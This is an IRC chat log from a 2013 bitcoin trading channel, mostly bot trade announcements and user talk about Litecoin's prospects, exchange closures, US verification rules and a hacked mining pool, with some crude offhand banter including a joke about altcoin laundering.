0.149 BTC [-] {3} Oct 21 15:32:57 <pankkake> just trying to help you skinnkavaj :) Oct 21 15:33:25 <Apocalyptic> pankkake, my guess is he's fully loaded in ltc and can't buy more anyway Oct 21 15:33:36 <pankkake> yes, sadly a possibility Oct 21 15:33:50 <pankkake> you can assume everyone's telling you to buy is selling, by default :p Oct 21 15:34:02 <pankkake> or at least holding Oct 21 15:34:03 <Apocalyptic> of course he bought some days ago, at 0.1* levels, trolling shit now Oct 21 15:34:21 <Apocalyptic> 0.01* Oct 21 15:35:27 <pankkake> well buying at 0.01* isn't so bad. I'm glad I sold those I got at 0.03 or something :) (thankfully they were invested and I didn't lose BTC-wise) Oct 21 15:36:21 <pankkake> (sold at 0.02) Oct 21 15:36:47 <Vexual> litecoins current primary fucntion is cleaning dirty bitcoin for crims Oct 21 15:36:59 <Vexual> and silroad got busted Oct 21 15:37:07 <pankkake> Vexual: indeed, but any altcoin can do that Oct 21 15:37:28 <pankkake> actually, more obscure blockchains are probably better; though having a small spread is obviously good Oct 21 15:38:26 <pankkake> hmm I guess I could write some software to find the best altcoin to launder by looking at orderbooks Oct 21 15:38:32 <Vexual> well if some aspbergers find the windows box or blackberry or whatever with the seized silkroad keys on it, you migth want some overpriced ltc asks somewhere Oct 21 15:39:01 <Vexual> you could make a tumbler that works Oct 21 15:41:45 <assbot> [HAVELOCK] [AM100] 87 @ 0.0074 = 0.6438 BTC [+] Oct 21 15:42:46 <assbot> [HAVELOCK] [HIM] 8 @ 0.07497499 = 0.5998 BTC [+] {3} Oct 21 15:45:07 <Vexual> some of those exchanges tell the fbi to fuck off for sport Oct 21 15:45:49 <assbot> [HAVELOCK] [B] [XBOND] 322 @ 0.001155 = 0.3719 BTC [+] Oct 21 15:47:51 <assbot> [HAVELOCK] [AM100] 60 @ 0.00746 = 0.4476 BTC [+] Oct 21 15:47:52 <assbot> [HAVELOCK] [VTX] 1 @ 0.40999996 BTC [+] Oct 21 15:52:00 <pankkake> ;;bc,stats Oct 21 15:52:03 <gribble> Current Blocks: 265069 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 1042 blocks | Next Difficulty In About: 4 days, 23 hours, 39 minutes, and 19 seconds | Next Difficulty Estimate: 360668416.691 | Estimated Percent Change: 34.71286 Oct 21 15:58:05 <pankkake> why was "Coinbase Will Integrate Litecoin" rejected for Too late? did they add it? Oct 21 15:59:02 <assbot> [HAVELOCK] [NEOBEE] 176 @ 0.00264918 = 0.4663 BTC [+] Oct 21 16:00:03 <assbot> [HAVELOCK] [NEOBEE] 42 @ 0.0026492 = 0.1113 BTC [+] Oct 21 16:01:04 <assbot> [HAVELOCK] [AM100] 131 @ 0.0071 = 0.9301 BTC [-] Oct 21 16:03:07 <assbot> [HAVELOCK] [B] [XBOND] 374 @ 0.001155 = 0.432 BTC [+] Oct 21 16:11:14 <assbot> [HAVELOCK] [AM100] 42 @ 0.00747 = 0.3137 BTC [-] Oct 21 16:22:11 <Rulother> Hey I need some software to record activity on my desktop, gots to make a demo for my company, any suggestions? Oct 21 16:24:24 <Troic> recordmydesktop Oct 21 16:25:28 <assbot> [HAVELOCK] [VTX] 3 @ 0.4098 = 1.2294 BTC [-] Oct 21 16:26:23 <Rulother> thanks Oct 21 16:26:29 <assbot> [HAVELOCK] [VTX] 4 @ 0.380015 = 1.5201 BTC [-] {2} Oct 21 16:28:31 <Rulother> windows? Oct 21 16:29:10 <Troic> maybe on windows, I use it on *nix Oct 21 16:34:38 <assbot> [HAVELOCK] [HIM] 10 @ 0.075 = 0.75 BTC [+] Oct 21 16:46:49 <assbot> [HAVELOCK] [AM1] 25 @ 0.70617118 = 17.6543 BTC [-] {14} Oct 21 16:47:50 <assbot> [HAVELOCK] [AM100] 229 @ 0.00701404 = 1.6062 BTC [-] {12} Oct 21 16:51:54 <assbot> [HAVELOCK] [VTX] 3 @ 0.380015 = 1.14 BTC [-] {2} Oct 21 17:08:10 <assbot> [HAVELOCK] [AM100] 370 @ 0.00671326 = 2.4839 BTC [-] {14} Oct 21 17:25:27 <assbot> [HAVELOCK] [AM100] 105 @ 0.00661999 = 0.6951 BTC [+] {3} Oct 21 17:26:01 <KRS1-> good morning from the U.S. Oct 21 17:26:29 <assbot> [HAVELOCK] [AM100] 99 @ 0.00660602 = 0.654 BTC [-] {3} Oct 21 17:30:33 <assbot> [HAVELOCK] [AM100] 250 @ 0.0066 = 1.65 BTC [-] Oct 21 17:31:19 <nubbins`> morning Oct 21 17:31:31 <nubbins`> although technically it's one minute past noon here Oct 21 17:33:36 <assbot> [HAVELOCK] [AM100] 150 @ 0.00664987 = 0.9975 BTC [+] {11} Oct 21 17:40:20 <KRS1-> U.K.? Oct 21 17:42:45 <assbot> [MPEX] [S.MPOE] 189 @ 0.00088 = 0.1663 BTC [-] Oct 21 17:44:26 <nubbins`> canada Oct 21 17:44:37 <topace> morning Oct 21 17:44:56 <topace> silly newfies Oct 21 17:45:00 <topace> and your extra half hour time zone Oct 21 17:45:48 <assbot> [HAVELOCK] [AM100] 200 @ 0.0065 = 1.3 BTC [-] Oct 21 17:49:52 <assbot> [HAVELOCK] [VTX] 7 @ 0.4 = 2.8 BTC [+] Oct 21 17:52:09 <nubbins`> the sun rises earlier in st. john's ;) Oct 21 18:12:13 <assbot> [HAVELOCK] [AM100] 61 @ 0.00609487 = 0.3718 BTC [-] {11} Oct 21 18:18:20 <assbot> [HAVELOCK] [AM1] 1 @ 0.69000001 BTC [-] Oct 21 18:19:43 <skinnkavaj> pankkake Oct 21 18:19:58 <skinnkavaj> Do you think that in one years LTC is completley dead, no one is talking about it Oct 21 18:20:22 <assbot> [MPEX] [S.MPOE] 5023 @ 0.00087842 = 4.4123 BTC [-] {3} Oct 21 18:20:30 <skinnkavaj> everyone forgot about mtgox, coblee with coinbase and his chinese brother running the btcchina exchange Oct 21 18:21:04 <pankkake> that's kind of vague Oct 21 18:21:09 <skinnkavaj> And ltc was just something hip for 2 years Oct 21 18:21:10 <skinnkavaj> ? Oct 21 18:21:30 <dexX7> hey pankkake Oct 21 18:21:36 <pankkake> well, I do think the hype phase is done yes Oct 21 18:21:42 <dexX7> can you create some am bets and spam the forum? Oct 21 18:21:45 <dexX7> =D Oct 21 18:22:04 <pankkake> dexX7: hehe, well there is http://bitbet.us/bet/534/price-of-asicminer-2-btc-per-share/ Oct 21 18:22:12 <skinnkavaj> pankkake: So LTC in one year has crashed even more? Oct 21 18:22:52 <dexX7> i was thinking about something like "gen 2 will be delievered before xx" and "am gen 2 has a lower power consumption than bitfury, knc and x" or so Oct 21 18:22:58 <pankkake> skinnkavaj: hard to know, but its market cap will be probably closer to other altcoins Oct 21 18:23:50 <pankkake> hmm I guess, but it's highly subjective, hard to say what is "gen 2" without proper announcments Oct 21 18:24:43 <skinnkavaj> pankkake: There is no way everyone will forget about Mtgox, Coinbase and Btcchina exchange.. The hype has not even begun. Oct 21 18:24:50 <pankkake> but I'll try to think about it :) Oct 21 18:25:39 <pankkake> what are some fiat exchanges going to bring, when you can very easily do fiat=>btc=>ltc anyway? the btc=>ltc step really isn't incovenent Oct 21 18:25:55 <pankkake> btc-e and kraken already tie it to fiat Oct 21 18:26:57 <skinnkavaj> pankkake: Merchants using LTC Oct 21 18:27:11 <dexX7> really? Oct 21 18:27:18 <skinnkavaj> The reason why Bitpay is not using LTC is beacause of lack of support from mtgox Oct 21 18:27:22 <skinnkavaj> They need big volume Oct 21 18:27:29 <pankkake> Coinbase can probably help with that, along with bringing web wallets I guess Oct 21 18:27:35 <skinnkavaj> Everyone has gone around waiting for MTgox Oct 21 18:27:38 <skinnkavaj> when it finally happens Oct 21 18:27:45 <skinnkavaj> do you think that LTC will go under in value? Oct 21 18:27:49 <pankkake> is coinbase using mtgox? how are they getting their USD? Oct 21 18:27:52 <skinnkavaj> Buy on rumours Oct 21 18:27:54 <skinnkavaj> Sell on news Oct 21 18:28:15 <skinnkavaj> pankkake: Coinbase use Mtgox Oct 21 18:28:34 <skinnkavaj> Look this is no secrete, coblee has even asked bitpay why no LTC.. yeah because no big exchange Oct 21 18:28:36 <skinnkavaj> support LTC Oct 21 18:28:46 <skinnkavaj> everyone has been waiting for mtgox Oct 21 18:29:42 <pankkake> that makes no sense, as it is very easy to do ltc=>btc=>fiat Oct 21 18:30:09 <skinnkavaj> Yes Oct 21 18:30:11 <skinnkavaj> for you and mei Oct 21 18:30:13 <skinnkavaj> its easy Oct 21 18:30:18 <skinnkavaj> who have 10 BTC? Oct 21 18:30:19 <pankkake> sure, you lose a bit with fees and spread Oct 21 18:30:22 <skinnkavaj> But ask Bitpay Oct 21 18:30:26 <skinnkavaj> how big volume Oct 21 18:30:28 <skinnkavaj> do you think they have? Oct 21 18:30:30 <btcgaming__> Try your luck at crossing a minefield! Free play! ~~ https://www.satoshi-karoshi.com/?r=10670 ~~ Oct 21 18:33:44 <pankkake> hmm coinbase's buy price is $182 while mtgox's is $192 Oct 21 18:34:14 <TomServo> ;;ticker Oct 21 18:34:14 <gribble> MtGox BTCUSD ticker | Best bid: 192.50002, Best ask: 193.50076, Bid-ask spread: 1.00074, Last trade: 193.69972, 24 hour volume: 22260.28449495, 24 hour low: 181.00013, 24 hour high: 197.39005, 24 hour vwap: 190.41948 Oct 21 18:34:30 <TomServo> It'd be nice to gribble start quoting bitcoinaverage.com or some such. Oct 21 18:34:48 <pankkake> at least stop using mtgox by default, especially for commands where you can't chose Oct 21 18:34:55 <skinnkavaj> TomServo: ask nanotube about it Oct 21 18:35:39 <dexX7> bitcoinaverage.com is indeed a great website Oct 21 18:36:20 <TomServo> Indeed, love the big "ignore gox price" button Oct 21 18:36:46 <dexX7> :D Oct 21 18:37:39 <assbot> [HAVELOCK] [AM1] 12 @ 0.68833333 = 8.26 BTC [-] {2} Oct 21 18:37:40 <skinnkavaj> So pankkake is now speechless about LTC Oct 21 18:37:50 <skinnkavaj> I bet he is secretley buying Oct 21 18:37:52 <pankkake> uh? lol Oct 21 18:38:20 <pankkake> what is there to add? Oct 21 18:38:49 <pankkake> https://kojn-app.com/ they support ltc - and I've seen an altcoin payment processor that automatically converted to bitcoin Oct 21 18:39:07 <pankkake> so it is possible *now* even without a directly tied to fiat exchange, because it's so easy to exchange altcoins Oct 21 18:56:58 <assbot> [HAVELOCK] [B] [XBOND] 546 @ 0.00115054 = 0.6282 BTC [-] {7} Oct 21 19:01:02 <assbot> [HAVELOCK] [AM100] 158 @ 0.00691894 = 1.0932 BTC [+] {5} Oct 21 19:03:04 <assbot> [HAVELOCK] [AM100] 25 @ 0.007 = 0.175 BTC [+] Oct 21 19:12:14 <assbot> [HAVELOCK] [AM100] 101 @ 0.007 = 0.707 BTC [+] Oct 21 19:23:09 <jurov> !t m s.nsa Oct 21 19:23:10 <assbot> [MPEX:S.NSA] 1D: 0.00028 / 0.00028 / 0.00028 (100 shares, 0.03 BTC), 7D: 0.0001 / 0.0001 / 0.00028 (4737175 shares, 473.74 BTC), 30D: 0.0001 / 0.0001 / 0.00028 (4737175 shares, 473.74 BTC) Oct 21 19:23:24 <assbot> [MPEX] [S.MPOE] 5944 @ 0.00087714 = 5.2137 BTC [-] Oct 21 19:29:30 <assbot> [HAVELOCK] [AM100] 96 @ 0.007 = 0.672 BTC [+] {2} Oct 21 19:35:08 <jurov> Ukyo, I'd like to reissue CoinBr.iDiff-E but wanted to get verified first... but still waiting :( Oct 21 20:04:05 <assbot> [HAVELOCK] [AM1] 5 @ 0.67419999 = 3.371 BTC [-] {5} Oct 21 20:12:07 <Kushed> . Oct 21 20:34:35 <assbot> [HAVELOCK] [VTX] 39 @ 0.39999999 = 15.6 BTC [-] {3} Oct 21 20:38:49 <pankkake> http://cointerra.com/product/terraminer-iv-2ths-networked-miner-january-batch/ new pictures Oct 21 20:42:21 <kakobrekla> where are labcoin pictures Oct 21 20:42:54 <jcpham> at the printer obv Oct 21 20:44:45 <assbot> [HAVELOCK] [VTX] 6 @ 0.4 = 2.4 BTC [+] Oct 21 21:18:18 <assbot> [MPEX] [S.MPOE] 443 @ 0.00087714 = 0.3886 BTC [-] Oct 21 21:20:20 <assbot> [HAVELOCK] [NEOBEE] 10000 @ 0.00218491 = 21.8491 BTC [-] {21} Oct 21 21:21:21 <assbot> [HAVELOCK] [VTX] 1 @ 0.40999995 BTC [+] Oct 21 21:26:26 <assbot> [MPEX] [S.MG] 4461 @ 0.00015 = 0.6692 BTC [-] Oct 21 21:33:34 <assbot> [HAVELOCK] [VTX] 2 @ 0.4 = 0.8 BTC [-] Oct 21 21:34:18 <dub> ;;ticker --market all Oct 21 21:34:28 <gribble> MtGox BTCUSD last: 192.99999, vol: 22501.56130459 | Bitstamp BTCUSD last: 177.03, vol: 26599.82333438 | BTC-E BTCUSD last: 169.28, vol: 11013.007 | Bitfinex BTCUSD last: 178.0, vol: 5013.0485047 | CampBX BTCUSD last: 168.50, vol: 865.87779979 | Volume-weighted last average: 181.143683516 Oct 21 21:39:40 <assbot> [HAVELOCK] [AM1] 1 @ 0.705 BTC [+] Oct 21 21:41:42 <assbot> [HAVELOCK] [AM100] 39 @ 0.0068 = 0.2652 BTC [-] Oct 21 21:44:45 <assbot> [HAVELOCK] [HIM] 19 @ 0.07 = 1.33 BTC [-] {2} Oct 21 21:54:52 <jurov> ;;ticker Oct 21 21:54:53 <gribble> MtGox BTCUSD ticker | Best bid: 193.00000, Best ask: 193.73999, Bid-ask spread: 0.73999, Last trade: 193.74000, 24 hour volume: 22645.45965562, 24 hour low: 182.55231, 24 hour high: 197.39005, 24 hour vwap: 190.98508 Oct 21 21:55:05 <jurov> ;;asks 200 Oct 21 21:55:07 <gribble> There are currently 7726.7519 bitcoins offered at or under 200.0 USD, worth 1529282.36191 USD in total. | Data vintage: 0.0015 seconds Oct 21 22:01:11 <MobGod> can ahyone tell me what the command would be to check a price? Oct 21 22:01:17 <MobGod> anyone* Oct 21 22:01:21 <MobGod> looking for asicminer Oct 21 22:01:36 <kakobrekla> on which exchange Oct 21 22:02:15 <kakobrekla> but anyway, !ticker <exchange> <symbol> Oct 21 22:02:23 <MobGod> kakobrekla doesn't matter maybe a general price Oct 21 22:02:24 <kakobrekla> !t m s.bbet Oct 21 22:02:26 <assbot> [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00061999 / 0.00061999 / 0.00061999 (5000 shares, 3.10 BTC), 30D: 0.0005 / 0.00054865 / 0.00061999 (43300 shares, 23.76 BTC) Oct 21 22:04:04 <assbot> [HAVELOCK] [VTX] 1 @ 0.4 BTC [-] Oct 21 22:04:25 <mike_c> !t h am1 Oct 21 22:04:27 <assbot> [HAVELOCK:AM1] 1D: 0.66000000 / 0.73022396 / 0.78799900 (95 shares, 69.37127654 BTC), 7D: 0.52700020 / 0.65301904 / 0.85799990 (1412 shares, 922.06288531 BTC), 30D: 0.52700020 / 0.91519381 / 1.76899999 (3196 shares, 2924.95942608 BTC) Oct 21 22:06:01 <deadweasel> http://projectshield.withgoogle.com/ Oct 21 22:06:01 <ozbot> Project Shield Oct 21 22:06:09 <deadweasel> is this going to be any good? Oct 21 22:06:51 <MobGod> i was using this site https://btct.co does anyone suggest anyone i can use ? Oct 21 22:07:00 <MobGod> another* Oct 21 22:09:44 <kakobrekla> play exchange or real exchange? Oct 21 22:13:26 <lewicki> .d Oct 21 22:13:27 <ozbot> 267731249.48242 | Next Diff in 986 blocks | Estimated Change: 35.2315% in 4d 10h 24m 6s Oct 21 22:15:15 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.0011499 = 0.115 BTC [-] Oct 21 22:17:53 <dub> deadweasel: lol Oct 21 22:18:06 <dub> im sure google is happy to "protect" any content they can Oct 21 22:21:14 <deadweasel> they certainly have the infrastructure to beat cloudflares abilities.. Oct 21 22:21:32 <deadweasel> i have no resources that need protect, so it's just curiousity. Oct 21 22:23:23 <assbot> [HAVELOCK] [AM100] 19 @ 0.0068 = 0.1292 BTC [-] Oct 21 22:25:09 <MobGod> sup dub Oct 21 22:26:00 <Bunnyh> http://bitbet.us/bet/525/litecoin-to-fall-below-01-btc-before-2014/ this should be resolved to YES soon, right? Oct 21 22:26:02 <ozbot> BitBet - Litecoin to fall below .01 BTC before 2014 Oct 21 22:27:08 <skinnkavaj> Bunnyh: The time to buy LTC is NOW Oct 21 22:27:19 <nubbins`> !t h am1 Oct 21 22:27:20 <Bunnyh> lol, the ltc troll awakens Oct 21 22:27:20 <assbot> [HAVELOCK:AM1] 1D: 0.66000000 / 0.72694694 / 0.78799899 (89 shares, 64.69827754 BTC), 7D: 0.52700020 / 0.65301904 / 0.85799990 (1412 shares, 922.06288531 BTC), 30D: 0.52700020 / 0.91519381 / 1.76899999 (3196 shares, 2924.95942608 BTC) Oct 21 22:27:35 <nubbins`> is that low / last / high, errr..? Oct 21 22:27:51 <skinnkavaj> Bunnyh: I will be here in this channel until LTC is 0.1 Oct 21 22:28:10 <MobGod> so does anyone know who i can use now that btct is gone ? Oct 21 22:28:28 <kakobrekla> play exchange or real exchange? Oct 21 22:28:56 <MobGod> real Oct 21 22:29:01 <MobGod> why would i play lol Oct 21 22:29:01 <kakobrekla> mpex Oct 21 22:29:12 <kakobrekla> cause you seem to be playing Oct 21 22:29:22 <MobGod> kakobrekla so no more back doors Oct 21 22:29:31 <kakobrekla> hm? Oct 21 22:30:30 <assbot> [HAVELOCK] [B] [XBOND] 329 @ 0.00114002 = 0.3751 BTC [-] {4} Oct 21 22:31:19 <nubbins`> you mean massive csrf vulnerabilities that existed on a bunch of exchanges until recently? Oct 21 22:31:31 <assbot> [HAVELOCK] [B] [XBOND] 103 @ 0.00114 = 0.1174 BTC [-] {2} Oct 21 22:31:37 <nubbins`> nope, none of those on mpex Oct 21 22:31:52 <pankkake> investors like it in the back door Oct 21 22:32:19 <phungus> I want to find a copy of that porno movie Oct 21 22:32:23 <phungus> the original "Behind the Back Door" Oct 21 22:32:26 <phungus> it was soo good Oct 21 22:32:29 <phungus> from the 80's Oct 21 22:32:36 <phungus> lol Oct 21 22:32:45 <pankkake> Bunnyh: I'm actually surprised no one is trying to bet after the fact Oct 21 22:33:03 <kakobrekla> people do learn if you take their money. Oct 21 22:33:14 <pankkake> it looks like the last bets were a lesson, yes :) Oct 21 22:33:40 <MobGod> kakobrekla so nothing really out there Oct 21 22:33:47 <kakobrekla> O_o Oct 21 22:33:53 <kakobrekla> thats what you said Oct 21 22:34:12 <MobGod> i'm asking what people are using now Oct 21 22:34:23 <kakobrekla> thats completley different question Oct 21 22:34:40 <MobGod> i'm sure they all didn't goto mpex Oct 21 22:34:54 <kakobrekla> no, most of them are still playing on other exchanges Oct 21 22:35:13 <kakobrekla> such as GLBSE and Oct 21 22:35:20 <kakobrekla> err i ment BTCtco Oct 21 22:35:37 <kakobrekla> and buttfunder Oct 21 22:36:41 <pankkake> buttfinder Oct 21 22:36:58 <pankkake> bitfodder Oct 21 22:39:05 <deadweasel> it's called 'Behind the Green Door' Oct 21 22:39:13 <deadweasel> and it's a great Porno. Oct 21 22:39:37 <deadweasel> although I'm sure there are plenty with back-door in the title. Oct 21 22:44:03 <phungus> no Oct 21 22:44:10 <phungus> not behind the Green door Oct 21 22:44:20 <phungus> that is a distinct movie from the one I'm talking about Oct 21 22:44:32 <phungus> Behind the Back Door is different and lower budget Oct 21 22:44:37 <phungus> but I think it may have had Ginger Lynn in it Oct 21 22:45:02 <phungus> that was like, the first porno I ever watched Oct 21 22:45:02 <phungus> lol Oct 21 22:45:40 <deadweasel> ditto for me on the Green Door. first..... of MANY. Oct 21 22:45:52 <deadweasel> thank god my dad had a VHS stash. Oct 21 22:46:01 <phungus> yeah this came from my friend's dad Oct 21 22:46:02 <phungus> lol Oct 21 22:46:08 <phungus> my own dad didn't do porno Oct 21 22:46:16 <deadweasel> or you couldn't find it.... Oct 21 22:46:20 <deadweasel> .. Oct 21 22:46:23 <deadweasel> . Oct 21 22:46:44 <phungus> no he didn't Oct 21 22:46:57 <phungus> I found everything else Oct 21 22:46:58 <phungus> lol Oct 21 22:48:30 <deadweasel> haha. OMG i hope my non-existent children don't find my browser history. Oct 21 22:49:10 <MobGod> kakobrekla i think they are closed also Oct 21 22:49:23 <kakobrekla> MobGod play exchanges tend to do that. Oct 21 22:50:10 <MobGod> kakobrekla ok than to ask the question correctly any play exchanges around right now Oct 21 22:51:06 <kakobrekla> a few Oct 21 22:51:56 <pigeons> bitfunder is only closed to "united states persons" Oct 21 22:52:17 <pigeons> or entities Oct 21 22:52:25 <pankkake> it's closed to anyone wanting to be anonymous, too Oct 21 22:52:35 <pigeons> yes Oct 21 22:52:49 <pigeons> another good play exchange is havelock Oct 21 22:52:54 <kakobrekla> and also closed to anyone who doesnt want to use some 3rd party site for deposits Oct 21 22:53:04 <pigeons> doubt you can be anonymous or a united states person or entity there either Oct 21 22:53:11 <pankkake> it's also closed to anyone who value having a >50% chance of getting back their coins Oct 21 22:53:11 <pigeons> oh, yeah, what he said Oct 21 22:53:13 <phungus> havelock is not accepting new listings Oct 21 22:53:17 <pankkake> :) Oct 21 22:53:22 <phungus> until they figure out regulations Oct 21 22:53:24 <phungus> :-( Oct 21 22:53:33 <phungus> BitVPS is Shit out of luck right now Oct 21 22:53:39 <nubbins`> http://bitbet.us/bet/552/havelock-will-announce-us-restrictions-by-guy-fawkes/ Oct 21 22:53:40 <pigeons> hey how about just-dice for the man then Oct 21 22:53:40 <ozbot> BitBet - Havelock will announce US restrictions by Guy Fawkes Night Oct 21 22:53:48 <pankkake> it's funny that weexchange supports gpg authentication, but if you enable it, you are locked out of your account Oct 21 22:53:55 <pankkake> as there is no way to actually use it Oct 21 22:53:58 <kakobrekla> lol Oct 21 22:54:02 <pankkake> by support, I mean there is an option Oct 21 22:54:14 <pankkake> and of course, good luck getting *any* support Oct 21 22:54:20 <nubbins`> weexchange is why i never had a bitfunder account Oct 21 22:54:28 <nubbins`> who wants to sign up for two new things at once? Oct 21 22:54:28 <kakobrekla> idiots doing idiotic things, nothing new in the btc world. Oct 21 22:54:34 <pankkake> well, I created an account, luckily never put coins Oct 21 22:55:13 <pigeons> ooh i have a good play exchange if you liked btct. crypto-trade.com sells "shares" in his "ddos prevention biznas" and the exchange itstelf in ltc and btc Oct 21 22:55:37 <kakobrekla> what about crypto stocks Oct 21 22:55:41 <kakobrekla> and 123.com Oct 21 22:55:49 <kakobrekla> and umm what was the other one Oct 21 22:56:01 <kakobrekla> i forgot Oct 21 22:56:08 <pigeons> yeah cryptostocks, which will never get hacked cause its run by vircurex Oct 21 22:56:38 <pigeons> oh relatively new one cex.io Oct 21 22:56:53 <kakobrekla> and mcxnow Oct 21 22:57:05 <pigeons> yes, get in at the top Oct 21 22:57:05 <kakobrekla> that one has built in ponzi Oct 21 22:57:11 <kakobrekla> good stuff Oct 21 22:57:31 <kakobrekla> i think everyone should invest there Oct 21 22:57:34 <pigeons> hey what about the nasty fan club? Oct 21 22:57:50 <kakobrekla> oh yeah, nasty is the man. Oct 21 22:58:21 <kakobrekla> and BFL has preorders security exhcange Oct 21 22:58:24 <dexX7> "build in ponzi" lol Oct 21 22:58:45 <dexX7> mcxnow is just an altcoin exchange, nothing more Oct 21 22:58:53 <dexX7> they don't want securities Oct 21 22:58:56 <kakobrekla> it pays daily interests on deposit Oct 21 22:59:03 <kakobrekla> and they have itself listed Oct 21 22:59:07 <kakobrekla> and trading there Oct 21 22:59:09 <dexX7> yea Oct 21 22:59:10 <pigeons> dexX7: they have a security called "FEEshares" Oct 21 22:59:25 <dexX7> i know Oct 21 22:59:36 <kakobrekla> i think BFL preorders are the way to go Oct 21 22:59:45 <kakobrekla> get em while they are cheap! Oct 21 22:59:52 <pigeons> i would get in on some litecoin ASICs Oct 21 22:59:53 <dexX7> oh wait. is the bfl preorder exchange already up? Oct 21 22:59:58 <kakobrekla> it isnt? Oct 21 23:00:02 <dexX7> i don't know? Oct 21 23:00:03 <dexX7> hehe Oct 21 23:00:04 <kakobrekla> twas like 2 weeks 2 months ago Oct 21 23:00:09 <kakobrekla> should be up by tomorrow Oct 21 23:00:29 <kakobrekla> as soon as jalapenos ship ya know Oct 21 23:00:39 <dexX7> yeah, probably tomorrow or the day after Oct 21 23:00:45 <pankkake> even bfl fails at exploiting its failures Oct 21 23:00:48 <kakobrekla> maybe even yesterday Oct 21 23:00:50 <kakobrekla> if we are lucky Oct 21 23:08:52 <BigBitz> Two Weeks. Min. Oct 21 23:17:16 <assbot> [HAVELOCK] [AM1] 2 @ 0.73999989 = 1.48 BTC [+] Oct 21 23:17:18 <assbot> [HAVELOCK] [B] [XBOND] 3165 @ 0.00109016 = 3.4504 BTC [-] {8} Oct 21 23:18:18 <assbot> [HAVELOCK] [B] [XBOND] 1645 @ 0.00109 = 1.7931 BTC [-] Oct 21 23:18:45 <FabianB_> 21:53 < pankkake> it's funny that weexchange supports gpg authentication, but if you enable it, you are locked out of your account Oct 21 23:19:20 <FabianB_> pankkake: i didn't use it for a while, but it used to work like this: put "gpg" in the password field instead of your password Oct 21 23:19:32 <pankkake> oh Oct 21 23:19:36 <FabianB_> pankkake: then you can authenticate via gpg Oct 21 23:20:01 <pankkake> indeed Oct 21 23:20:20 <assbot> [HAVELOCK] [VTX] 5 @ 0.39 = 1.95 BTC [-] Oct 21 23:20:49 <pankkake> thanks Oct 21 23:21:05 <FabianB_> pankkake: np Oct 21 23:21:22 <FabianB_> don't know why Ukyo never documented it Oct 21 23:22:22 <assbot> [HAVELOCK] [AM1] 2 @ 0.74 = 1.48 BTC [+] Oct 21 23:24:24 <assbot> [HAVELOCK] [AM1] 2 @ 0.73999989 = 1.48 BTC [-] Oct 21 23:25:25 <assbot> [HAVELOCK] [AM1] 4 @ 0.73999989 = 2.96 BTC [-] Oct 21 23:27:27 <assbot> [HAVELOCK] [AM1] 2 @ 0.73999989 = 1.48 BTC [-] Oct 21 23:28:28 <assbot> [HAVELOCK] [AM1] 1 @ 0.73999989 BTC [-] Oct 21 23:53:57 <Ukyo> FabianB_: if you enabled gpg, you must use 'gpg' as password when you login Oct 21 23:54:14 <Ukyo> was a broken method to get to gpg auth method at login Oct 21 23:54:26 <Ukyo> the new weex site just has you log in normally and then do gpg auth Oct 21 23:56:55 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114765 = 0.1148 BTC [+] {3} Oct 21 23:58:05 <FabianB_> Ukyo: np for those who know i guess Oct 21 23:59:39 <the20year> Ukyo: What are asset issuers expected to do with regards to our assets on BF if we personally are located in the US? I can't verify due to living in the US, unless you want me to get the nominee director verified. Oct 22 00:02:10 <Ukyo> you can verify regardless of where you are Oct 22 00:02:17 <Ukyo> and if you are an issuer, regardless you should be verified Oct 22 00:02:21 <the20year> but won't verifying that i'm in the US lock me out? Oct 22 00:02:29 <Ukyo> besides, with the new weex licensing coming up, if you are us you will wanna be verified Oct 22 00:02:30 <Ukyo> :P Oct 22 00:02:45 <Ukyo> regardless a us based account will be locked out of buying Oct 22 00:02:51 <Ukyo> weather you verify or not Oct 22 00:02:54 <the20year> Even my own asset? Oct 22 00:02:55 <Ukyo> and as of nov 1 Oct 22 00:02:57 <Ukyo> if you are not verified Oct 22 00:03:00 <Ukyo> you will be locked out Oct 22 00:03:03 <Ukyo> fully Oct 22 00:03:09 <the20year> k Oct 22 00:03:12 <jurov> btw, i have inquired about being a BF broker for these poor US citizens... but as there is no api the prospect is moot Oct 22 00:03:31 <jurov> but if offline broker os okay, you can approach me anyway ;) Oct 22 00:03:37 <jurov> *is okay Oct 22 00:03:38 <Ukyo> there is api. just the trade function is still in testing Oct 22 00:03:45 <Ukyo> i cant give you permission to be a broker. Oct 22 00:03:53 <Ukyo> not an area of discussion i can have Oct 22 00:04:05 <jurov> what if i wont ask? Oct 22 00:04:08 <the20year> call the ukyo legal team for help Oct 22 00:04:20 <Ukyo> hehe Oct 22 00:04:28 <the20year> are you going to go to ip filtering soon? Oct 22 00:04:31 <Ukyo> the20year: as for continuance of assets, I should have more info soon Oct 22 00:04:38 <Ukyo> the20year: already checking for ip Oct 22 00:04:38 <the20year> or is the weex threshold good enough for your lawyers? Oct 22 00:04:51 <Ukyo> but once nov1 hits, if your not weex verified, ip wont matter Oct 22 00:04:54 <the20year> I have this feeling your legal team and mine are telling us the same things :( Oct 22 00:05:03 <the20year> i'll get those docs out to weex right now Oct 22 00:05:20 <Ukyo> btw, if you have issuer docs, for corp info, open a ticket and post it Oct 22 00:05:23 <Ukyo> url to images Oct 22 00:05:23 <Ukyo> etc Oct 22 00:05:26 <the20year> k Oct 22 00:05:35 <Ukyo> to have it filed on your asset data Oct 22 00:05:39 <Ukyo> internally Oct 22 00:05:40 <the20year> i'm waiting for our HK seal and stuff, we're doing the nominee director thing and it's taking longer than I had hoped Oct 22 00:05:50 <jborkl> so 50btc got hacked Oct 22 00:06:04 <Ukyo> welcome to bitcoin Oct 22 00:06:20 <Ukyo> they have finally been initiated Oct 22 00:07:05 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00108001 = 0.108 BTC [-] Oct 22 00:07:07 <dexX7> http://www.theguardian.com/technology/2013/oct/21/bitcoin-price-surges-to-post-crash-high Bitcoin receives criticism for its "mining" mechanic, ... Once cybercriminals recognised the monetary opportunity in Bitcoin, ... In a few weeks, he earned 30 bitcoins, currently worth about $6,000, but damaged customers' computers in the process. << stupid mining mechanic, used by criminals to Oct 22 00:07:07 <dexX7> damage computers >D Oct 22 00:07:07 <ozbot> Bitcoin price surges to post-crash high | Technology | theguardian.com Oct 22 00:07:12 <jborkl> I guess you have had a busy couple weeks ukyo Oct 22 00:07:20 <Ukyo> had? heh Oct 22 00:07:24 <Ukyo> have and upcoming Oct 22 00:07:42 <jborkl> lol Oct 22 00:07:48 <the20year> 